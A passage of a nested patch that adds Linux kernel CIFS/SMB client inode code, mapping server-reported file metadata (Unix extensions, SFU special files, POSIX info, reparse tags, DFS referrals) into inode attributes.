++		fattr->cf_mode |= S_IFCHR;
++		fattr->cf_dtype = DT_CHR;
++		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
++				       le64_to_cpu(info->DevMinor) & MINORMASK);
++		break;
++	case UNIX_BLOCKDEV:
++		fattr->cf_mode |= S_IFBLK;
++		fattr->cf_dtype = DT_BLK;
++		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
++				       le64_to_cpu(info->DevMinor) & MINORMASK);
++		break;
++	case UNIX_FIFO:
++		fattr->cf_mode |= S_IFIFO;
++		fattr->cf_dtype = DT_FIFO;
++		break;
++	case UNIX_SOCKET:
++		fattr->cf_mode |= S_IFSOCK;
++		fattr->cf_dtype = DT_SOCK;
++		break;
++	default:
++		/* safest to call it a file if we do not know */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		cifs_dbg(FYI, "unknown type %d\n", le32_to_cpu(info->Type));
++		break;
++	}
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)) {
++		u64 id = le64_to_cpu(info->Uid);
++		if (id < ((uid_t)-1)) {
++			kuid_t uid = make_kuid(&init_user_ns, id);
++			if (uid_valid(uid))
++				fattr->cf_uid = uid;
++		}
++	}
++
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)) {
++		u64 id = le64_to_cpu(info->Gid);
++		if (id < ((gid_t)-1)) {
++			kgid_t gid = make_kgid(&init_user_ns, id);
++			if (gid_valid(gid))
++				fattr->cf_gid = gid;
++		}
++	}
++
++	fattr->cf_nlink = le64_to_cpu(info->Nlinks);
++}
++
++/*
++ * Fill a cifs_fattr struct with fake inode info.
++ *
++ * Needed to setup cifs_fattr data for the directory which is the
++ * junction to the new submount (ie to setup the fake directory
++ * which represents a DFS referral).
++ */
++static void
++cifs_create_dfs_fattr(struct cifs_fattr *fattr, struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	cifs_dbg(FYI, "creating fake fattr for DFS referral\n");
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_mode = S_IFDIR | S_IXUGO | S_IRWXU;
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++	ktime_get_coarse_real_ts64(&fattr->cf_mtime);
++	fattr->cf_atime = fattr->cf_ctime = fattr->cf_mtime;
++	fattr->cf_nlink = 2;
++	fattr->cf_flags = CIFS_FATTR_DFS_REFERRAL;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_get_file_info_unix(struct file *filp)
++{
++	int rc;
++	unsigned int xid;
++	FILE_UNIX_BASIC_INFO find_data;
++	struct cifs_fattr fattr = {};
++	struct inode *inode = file_inode(filp);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++
++	xid = get_xid();
++
++	if (cfile->symlink_target) {
++		fattr.cf_symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!fattr.cf_symlink_target) {
++			rc = -ENOMEM;
++			goto cifs_gfiunix_out;
++		}
++	}
++
++	rc = CIFSSMBUnixQFileInfo(xid, tcon, cfile->fid.netfid, &find_data);
++	if (!rc) {
++		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
++	} else if (rc == -EREMOTE) {
++		cifs_create_dfs_fattr(&fattr, inode->i_sb);
++		rc = 0;
++	} else
++		goto cifs_gfiunix_out;
++
++	rc = cifs_fattr_to_inode(inode, &fattr);
++
++cifs_gfiunix_out:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_get_inode_info_unix(struct inode **pinode,
++			     const unsigned char *full_path,
++			     struct super_block *sb, unsigned int xid)
++{
++	int rc;
++	FILE_UNIX_BASIC_INFO find_data;
++	struct cifs_fattr fattr;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	cifs_dbg(FYI, "Getting info on %s\n", full_path);
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	/* could have done a find first instead but this returns more info */
++	rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data,
++				  cifs_sb->local_nls, cifs_remap(cifs_sb));
++	cifs_dbg(FYI, "%s: query path info: rc = %d\n", __func__, rc);
++	cifs_put_tlink(tlink);
++
++	if (!rc) {
++		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
++	} else if (rc == -EREMOTE) {
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++	} else {
++		return rc;
++	}
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		int tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					     full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	if (S_ISLNK(fattr.cf_mode) && !fattr.cf_symlink_target) {
++		if (!server->ops->query_symlink)
++			return -EOPNOTSUPP;
++		rc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
++						&fattr.cf_symlink_target, false);
++		if (rc) {
++			cifs_dbg(FYI, "%s: query_symlink: %d\n", __func__, rc);
++			goto cgiiu_exit;
++		}
++	}
++
++	if (*pinode == NULL) {
++		/* get new inode */
++		cifs_fill_uniqueid(sb, &fattr);
++		*pinode = cifs_iget(sb, &fattr);
++		if (!*pinode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*pinode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto cgiiu_exit;
++		}
++
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*pinode, &fattr);
++	}
++
++cgiiu_exit:
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++#else
++int cifs_get_inode_info_unix(struct inode **pinode,
++			     const unsigned char *full_path,
++			     struct super_block *sb, unsigned int xid)
++{
++	return -EOPNOTSUPP;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
++	      struct cifs_sb_info *cifs_sb, unsigned int xid)
++{
++	int rc;
++	__u32 oplock;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	char buf[24];
++	unsigned int bytes_read;
++	char *pbuf;
++	int buf_type = CIFS_NO_BUFFER;
++
++	pbuf = buf;
++
++	fattr->cf_mode &= ~S_IFMT;
++
++	if (fattr->cf_eof == 0) {
++		fattr->cf_mode |= S_IFIFO;
++		fattr->cf_dtype = DT_FIFO;
++		return 0;
++	} else if (fattr->cf_eof < 8) {
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		return -EINVAL;	 /* EOPNOTSUPP? */
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, NULL);
++	if (rc) {
++		cifs_dbg(FYI, "check sfu type of %s, open rc = %d\n", path, rc);
++		cifs_put_tlink(tlink);
++		return rc;
++	}
++
++	/* Read header */
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = 24;
++
++	rc = tcon->ses->server->ops->sync_read(xid, &fid, &io_parms,
++					&bytes_read, &pbuf, &buf_type);
++	if ((rc == 0) && (bytes_read >= 8)) {
++		if (memcmp("IntxBLK", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "Block device\n");
++			fattr->cf_mode |= S_IFBLK;
++			fattr->cf_dtype = DT_BLK;
++			if (bytes_read == 24) {
++				/* we have enough to decode dev num */
++				__u64 mjr; /* major */
++				__u64 mnr; /* minor */
++				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
++				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
++				fattr->cf_rdev = MKDEV(mjr, mnr);
++			}
++		} else if (memcmp("IntxCHR", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "Char device\n");
++			fattr->cf_mode |= S_IFCHR;
++			fattr->cf_dtype = DT_CHR;
++			if (bytes_read == 24) {
++				/* we have enough to decode dev num */
++				__u64 mjr; /* major */
++				__u64 mnr; /* minor */
++				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
++				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
++				fattr->cf_rdev = MKDEV(mjr, mnr);
++			}
++		} else if (memcmp("IntxLNK", pbuf, 7) == 0) {
++			cifs_dbg(FYI, "Symlink\n");
++			fattr->cf_mode |= S_IFLNK;
++			fattr->cf_dtype = DT_LNK;
++		} else {
++			fattr->cf_mode |= S_IFREG; /* file? */
++			fattr->cf_dtype = DT_REG;
++			rc = -EOPNOTSUPP;
++		}
++	} else {
++		fattr->cf_mode |= S_IFREG; /* then it is a file */
++		fattr->cf_dtype = DT_REG;
++		rc = -EOPNOTSUPP; /* or some unknown SFU type */
++	}
++
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++#define SFBITS_MASK (S_ISVTX | S_ISGID | S_ISUID)  /* SETFILEBITS valid bits */
++
++/*
++ * Fetch mode bits as provided by SFU.
++ *
++ * FIXME: Doesn't this clobber the type bit we got from cifs_sfu_type ?
++ */
++static int cifs_sfu_mode(struct cifs_fattr *fattr, const unsigned char *path,
++			 struct cifs_sb_info *cifs_sb, unsigned int xid)
++{
++#ifdef CONFIG_CIFS_XATTR
++	ssize_t rc;
++	char ea_value[4];
++	__u32 mode;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	if (tcon->ses->server->ops->query_all_EAs == NULL) {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++
++	rc = tcon->ses->server->ops->query_all_EAs(xid, tcon, path,
++			"SETFILEBITS", ea_value, 4 /* size of buf */,
++			cifs_sb);
++	cifs_put_tlink(tlink);
++	if (rc < 0)
++		return (int)rc;
++	else if (rc > 3) {
++		mode = le32_to_cpu(*((__le32 *)ea_value));
++		fattr->cf_mode &= ~SFBITS_MASK;
++		cifs_dbg(FYI, "special bits 0%o org mode 0%o\n",
++			 mode, fattr->cf_mode);
++		fattr->cf_mode = (mode & SFBITS_MASK) | fattr->cf_mode;
++		cifs_dbg(FYI, "special mode bits 0%o\n", mode);
++	}
++
++	return 0;
++#else
++	return -EOPNOTSUPP;
++#endif
++}
++
++/* Fill a cifs_fattr struct with info from POSIX info struct */
++static void smb311_posix_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
++				       struct super_block *sb, bool adjust_tz, bool symlink)
++{
++	struct smb311_posix_qinfo *info = &data->posix_fi;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	memset(fattr, 0, sizeof(*fattr));
++
++	/* no fattr->flags to set */
++	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
++	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
++
++	if (info->LastAccessTime)
++		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	else
++		ktime_get_coarse_real_ts64(&fattr->cf_atime);
++
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++
++	if (adjust_tz) {
++		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
++		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
++	}
++
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
++	fattr->cf_mode = (umode_t) le32_to_cpu(info->Mode);
++	/* The srv fs device id is overridden on network mount so setting rdev isn't needed here */
++	/* fattr->cf_rdev = le32_to_cpu(info->DeviceId); */
++
++	if (symlink) {
++		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++		fattr->cf_symlink_target = data->symlink_target;
++		data->symlink_target = NULL;
++	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++	} else { /* file */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++	}
++	/* else if reparse point ... TODO: add support for FIFO and blk dev; special file types */
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid; /* TODO: map uid and gid from SID */
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++
++	cifs_dbg(FYI, "POSIX query info: mode 0x%x uniqueid 0x%llx nlink %d\n",
++		fattr->cf_mode, fattr->cf_uniqueid, fattr->cf_nlink);
++}
++
++static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
++				    struct super_block *sb, bool adjust_tz, bool symlink,
++				    u32 reparse_tag)
++{
++	struct smb2_file_all_info *info = &data->fi;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_cifsattrs = le32_to_cpu(info->Attributes);
++	if (info->DeletePending)
++		fattr->cf_flags |= CIFS_FATTR_DELETE_PENDING;
++
++	if (info->LastAccessTime)
++		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	else
++		ktime_get_coarse_real_ts64(&fattr->cf_atime);
++
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++
++	if (adjust_tz) {
++		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
++		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
++	}
++
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->NumberOfLinks);
++	if (reparse_tag == IO_REPARSE_TAG_LX_SYMLINK) {
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_LNK;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_FIFO) {
++		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_FIFO;
++	} else if (reparse_tag == IO_REPARSE_TAG_AF_UNIX) {
++		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_SOCK;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_CHR) {
++		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_CHR;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_BLK) {
++		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_BLK;
++	} else if (symlink || reparse_tag == IO_REPARSE_TAG_SYMLINK ||
++		   reparse_tag == IO_REPARSE_TAG_NFS) {
++		fattr->cf_mode = S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
++		fattr->cf_dtype = DT_DIR;
++		/*
++		 * Server can return wrong NumberOfLinks value for directories
++		 * when Unix extensions are disabled - fake it.
++		 */
++		if (!tcon->unix_ext)
++			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++	} else {
++		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_REG;
++
++		/* clear write bits if ATTR_READONLY is set */
++		if (fattr->cf_cifsattrs & ATTR_READONLY)
++			fattr->cf_mode &= ~(S_IWUGO);
++
++		/*
++		 * Don't accept zero nlink from non-unix servers unless
++		 * delete is pending.  Instead mark it as unknown.
++		 */
++		if ((fattr->cf_nlink < 1) && !tcon->unix_ext &&
++		    !info->DeletePending) {
++			cifs_dbg(VFS, "bogus file nlink value %u\n",
++				 fattr->cf_nlink);
++			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++		}
++	}
++
++	if (S_ISLNK(fattr->cf_mode)) {
++		fattr->cf_symlink_target = data->symlink_target;
++		data->symlink_target = NULL;
++	}
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++}
++
++static int
++cifs_get_file_info(struct file *filp)
++{
++	int rc;
++	unsigned int xid;
++	struct cifs_open_info_data data = {};
++	struct cifs_fattr fattr;
++	struct inode *inode = file_inode(filp);
++	struct cifsFileInfo *cfile = filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	bool symlink = false;
++	u32 tag = 0;
++
++	if (!server->ops->query_file_info)
++		return -ENOSYS;
++
++	xid = get_xid();
++	rc = server->ops->query_file_info(xid, tcon, cfile, &data);
++	switch (rc) {
++	case 0:
++		/* TODO: add support to query reparse tag */
++		if (data.symlink_target) {
++			symlink = true;
++			tag = IO_REPARSE_TAG_SYMLINK;
++		}
++		cifs_open_info_to_fattr(&fattr, &data, inode->i_sb, false, symlink, tag);
++		break;
++	case -EREMOTE:
++		cifs_create_dfs_fattr(&fattr, inode->i_sb);
++		rc = 0;
++		break;
++	case -EOPNOTSUPP:
++	case -EINVAL:
++		/*
++		 * FIXME: legacy server -- fall back to path-based call?
++		 * for now, just skip revalidating and mark inode for
++		 * immediate reval.
++		 */
++		rc = 0;
++		CIFS_I(inode)->time = 0;
++		goto cgfi_exit;
++	default:
++		goto cgfi_exit;
++	}
++
++	/*
++	 * don't bother with SFU junk here -- just mark inode as needing
++	 * revalidation.
++	 */
++	fattr.cf_uniqueid = CIFS_I(inode)->uniqueid;
++	fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++	/* if filetype is different, return error */
++	rc = cifs_fattr_to_inode(inode, &fattr);
++cgfi_exit:
++	cifs_free_open_info(&data);
++	free_xid(xid);
++	return rc;
++}
++
++/* Simple function to return a 64 bit hash of string.  Rarely called */
++static __u64 simple_hashstr(const char *str)
++{
++	const __u64 hash_mult =  1125899906842597ULL; /* a big enough prime */
++	__u64 hash = 0;
++
++	while (*str)
++		hash = (hash + (__u64) *str++) * hash_mult;
++
++	return hash;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/**
++ * cifs_backup_query_path_info - SMB1 fallback code to get ino
++ *
++ * Fallback code to get file metadata when we don't have access to
++ * full_path (EACCES) and have backup creds.
++ *
++ * @xid:	transaction id used to identify original request in logs
++ * @tcon:	information about the server share we have mounted
++ * @sb:	the superblock stores info such as disk space available
++ * @full_path:	name of the file we are getting the metadata for
++ * @resp_buf:	will be set to cifs resp buf and needs to be freed with
++ * 		cifs_buf_release() when done with @data
++ * @data:	will be set to search info result buffer
++ */
++static int
++cifs_backup_query_path_info(int xid,
++			    struct cifs_tcon *tcon,
++			    struct super_block *sb,
++			    const char *full_path,
++			    void **resp_buf,
++			    FILE_ALL_INFO **data)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_search_info info = {0};
++	u16 flags;
++	int rc;
++
++	*resp_buf = NULL;
++	info.endOfSearch = false;
++	if (tcon->unix_ext)
++		info.info_level = SMB_FIND_FILE_UNIX;
++	else if ((tcon->ses->capabilities &
++		  tcon->ses->server->vals->cap_nt_find) == 0)
++		info.info_level = SMB_FIND_FILE_INFO_STANDARD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		info.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
++	else /* no srvino useful for fallback to some netapp */
++		info.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++
++	flags = CIFS_SEARCH_CLOSE_ALWAYS |
++		CIFS_SEARCH_CLOSE_AT_END |
++		CIFS_SEARCH_BACKUP_SEARCH;
++
++	rc = CIFSFindFirst(xid, tcon, full_path,
++			   cifs_sb, NULL, flags, &info, false);
++	if (rc)
++		return rc;
++
++	*resp_buf = (void *)info.ntwrk_buf_start;
++	*data = (FILE_ALL_INFO *)info.srch_entries_start;
++	return 0;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static void cifs_set_fattr_ino(int xid, struct cifs_tcon *tcon, struct super_block *sb,
++			       struct inode **inode, const char *full_path,
++			       struct cifs_open_info_data *data, struct cifs_fattr *fattr)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		if (*inode)
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		else
++			fattr->cf_uniqueid = iunique(sb, ROOT_I);
++		return;
++	}
++
++	/*
++	 * If we have an inode pass a NULL tcon to ensure we don't
++	 * make a round trip to the server. This only works for SMB2+.
++	 */
++	rc = server->ops->get_srv_inum(xid, *inode ? NULL : tcon, cifs_sb, full_path,
++				       &fattr->cf_uniqueid, data);
++	if (rc) {
++		/*
++		 * If that fails reuse existing ino or generate one
++		 * and disable server ones
++		 */
++		if (*inode)
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		else {
++			fattr->cf_uniqueid = iunique(sb, ROOT_I);
++			cifs_autodisable_serverino(cifs_sb);
++		}
++		return;
++	}
++
++	/* If no errors, check for zero root inode (invalid) */
++	if (fattr->cf_uniqueid == 0 && strlen(full_path) == 0) {
++		cifs_dbg(FYI, "Invalid (0) inodenum\n");
++		if (*inode) {
++			/* reuse */
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		} else {
++			/* make an ino by hashing the UNC */
++			fattr->cf_flags |= CIFS_FATTR_FAKE_ROOT_INO;
++			fattr->cf_uniqueid = simple_hashstr(tcon->tree_name);
++		}
++	}
++}
++
++static inline bool is_inode_cache_good(struct inode *ino)
++{
++	return ino && CIFS_CACHE_READ(CIFS_I(ino)) && CIFS_I(ino)->time != 0;
++}
++
++int cifs_get_inode_info(struct inode **inode, const char *full_path,
++			struct cifs_open_info_data *data, struct super_block *sb, int xid,
++			const struct cifs_fid *fid)
++{
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	bool adjust_tz = false;
++	struct cifs_fattr fattr = {0};
++	bool is_reparse_point = false;
++	struct cifs_open_info_data tmp_data = {};
++	void *smb1_backup_rsp_buf = NULL;
++	int rc = 0;
++	int tmprc = 0;
++	__u32 reparse_tag = 0;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	/*
++	 * 1. Fetch file metadata if not provided (data)
++	 */
++
++	if (!data) {
++		if (is_inode_cache_good(*inode)) {
++			cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
++			goto out;
++		}
++		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
++						  &adjust_tz, &is_reparse_point);
++		data = &tmp_data;
++	}
++
++	/*
++	 * 2. Convert it to internal cifs metadata (fattr)
++	 */
++
++	switch (rc) {
++	case 0:
++		/*
++		 * If the file is a reparse point, it is more complicated
++		 * since we have to check if its reparse tag matches a known
++		 * special file type e.g. symlink or fifo or char etc.
++		 */
++		if (is_reparse_point && data->symlink_target) {
++			reparse_tag = IO_REPARSE_TAG_SYMLINK;
++		} else if ((le32_to_cpu(data->fi.Attributes) & ATTR_REPARSE) &&
++			   server->ops->query_reparse_tag) {
++			tmprc = server->ops->query_reparse_tag(xid, tcon, cifs_sb, full_path,
++							    &reparse_tag);
++			if (tmprc)
++				cifs_dbg(FYI, "%s: query_reparse_tag: rc = %d\n", __func__, tmprc);
++			if (server->ops->query_symlink) {
++				tmprc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
++								   &data->symlink_target,
++								   is_reparse_point);
++				if (tmprc)
++					cifs_dbg(FYI, "%s: query_symlink: rc = %d\n", __func__,
++						 tmprc);
++			}
++		}
++		cifs_open_info_to_fattr(&fattr, data, sb, adjust_tz, is_reparse_point, reparse_tag);
++		break;
++	case -EREMOTE:
++		/* DFS link, no metadata available on this server */
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++		break;
++	case -EACCES:
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++		/*
++		 * perm errors, try again with backup flags if possible
++		 *
++		 * For SMB2 and later the backup intent flag
++		 * is already sent if needed on open and there
++		 * is no path based FindFirst operation to use
++		 * to retry with
++		 */
++		if (backup_cred(cifs_sb) && is_smb1_server(server)) {
++			/* for easier reading */
++			FILE_ALL_INFO *fi;
++			FILE_DIRECTORY_INFO *fdi;
++			SEARCH_ID_FULL_DIR_INFO *si;
++
++			rc = cifs_backup_query_path_info(xid, tcon, sb,
++							 full_path,
++							 &smb1_backup_rsp_buf,
++							 &fi);
++			if (rc)
++				goto out;
++
++			move_cifs_info_to_smb2(&data->fi, fi);
++			fdi = (FILE_DIRECTORY_INFO *)fi;
++			si = (SEARCH_ID_FULL_DIR_INFO *)fi;
++
++			cifs_dir_info_to_fattr(&fattr, fdi, cifs_sb);
++			fattr.cf_uniqueid = le64_to_cpu(si->UniqueId);
++			/* uniqueid set, skip get inum step */
++			goto handle_mnt_opt;
++		} else {
++			/* nothing we can do, bail out */
++			goto out;
++		}
++#else
++		goto out;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		break;
++	default:
++		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
++		goto out;
++	}
++
++	/*
++	 * 3. Get or update inode number (fattr.cf_uniqueid)
++	 */
++
++	cifs_set_fattr_ino(xid, tcon, sb, inode, full_path, data, &fattr);
++
++	/*
++	 * 4. Tweak fattr based on mount options
++	 */
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++handle_mnt_opt:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	/* query for SFU type info if supported and needed */
++	if (fattr.cf_cifsattrs & ATTR_SYSTEM &&
++	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) {
++		tmprc = cifs_sfu_type(&fattr, full_path, cifs_sb, xid);
++		if (tmprc)
++			cifs_dbg(FYI, "cifs_sfu_type failed: %d\n", tmprc);
++	}
++
++	/* fill in 0777 bits from ACL */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) {
++		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, true,
++				       full_path, fid);
++		if (rc == -EREMOTE)
++			rc = 0;
++		if (rc) {
++			cifs_dbg(FYI, "%s: Get mode from SID failed. rc=%d\n",
++				 __func__, rc);
++			goto out;
++		}
++	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) {
++		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, false,
++				       full_path, fid);
++		if (rc == -EREMOTE)
++			rc = 0;
++		if (rc) {
++			cifs_dbg(FYI, "%s: Getting ACL failed with error: %d\n",
++				 __func__, rc);
++			goto out;
++		}
++	}
++
++	/* fill in remaining high mode bits e.g. SUID, VTX */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
++		cifs_sfu_mode(&fattr, full_path, cifs_sb, xid);
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					 full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	/*
++	 * 5. Update inode with final fattr data
++	 */
++
++	if (!*inode) {
++		*inode = cifs_iget(sb, &fattr);
